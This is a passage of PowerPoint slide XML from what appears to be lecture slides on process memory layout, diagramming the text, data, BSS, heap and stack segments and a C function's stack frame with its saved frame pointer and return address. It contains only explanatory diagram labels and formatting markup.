            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>dynamic space             </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	malloc(...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	new(...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Uninitialized global &amp; static vars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>named BSS by old convention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Initialized global &amp; static variables </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>machine instructions / code segments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="Shape 179"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1757700" x="4722769"/>
            <a:ext cy="4942200"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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RESERVED SPACE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>STACK</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RESERVED SPACE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HEAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TEXT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Shape 180"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1767950" x="6841550"/>
            <a:ext cy="416699" cx="1494300"/>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181" name="Shape 181"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1775825" x="6810075"/>
            <a:ext cy="393299" cx="1793099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0xFFFFFFFF </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>high memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Shape 182"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6195425" x="6810075"/>
            <a:ext cy="393299" cx="1793099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0x00000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>low memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="183" name="Shape 183"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1972425" x="3027175"/>
            <a:ext cy="534899" cx="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="184" name="Shape 184"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="179" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3686100" x="2125069"/>
            <a:ext cy="542700" cx="2597699"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="185" name="Shape 185"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="4567850" x="3797900"/>
            <a:ext cy="117899" cx="904499"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="186" name="Shape 186"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="5338599" x="3970925"/>
            <a:ext cy="157200" cx="723600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="187" name="Shape 187"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6313725" x="4387775"/>
            <a:ext cy="39300" cx="338100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="188" name="Shape 188"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2648800" x="5598925"/>
            <a:ext cy="424799" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="189" name="Shape 189"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2648800" x="5751325"/>
            <a:ext cy="424799" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="190" name="Shape 190"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2648800" x="5903725"/>
            <a:ext cy="424799" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="191" name="Shape 191"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="3687025" x="5606800"/>
            <a:ext cy="377399" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="192" name="Shape 192"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="3687025" x="5759200"/>
            <a:ext cy="377399" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="193" name="Shape 193"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="3687025" x="5911600"/>
            <a:ext cy="377399" cx="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199" name="Shape 199"/>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When we think about the stack, it is convenient</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to view it </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inverted</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> from the standard model.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>int function(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="1400" lang="en"/>
              <a:t>char *buf</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="1400" lang="en"/>
              <a:t>int var1 = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="1400" lang="en"/>
              <a:t>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00" name="Shape 200"/>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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>buf2</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var1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>saved frame pointer (SFP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a: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t>return address (ret)</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*buf (function's argument)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a: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SzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main()'s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Shape 201"/>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02" name="Shape 202"/>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03" name="Shape 203"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="201" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="2263550" x="5457489"/>
            <a:ext cy="4032000" cx="21300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="stealth"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Shape 204"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5427485">
            <a:off y="4253111" x="4285517"/>
            <a:ext cy="550518" cx="2138768"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>growth direction of stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Shape 205"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3742700" x="2261475"/>
            <a:ext cy="323099" cx="2238600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$EIP is here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="206" name="Shape 206"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="205" idx="1"/>
          </p:cNvCxnSpPr>
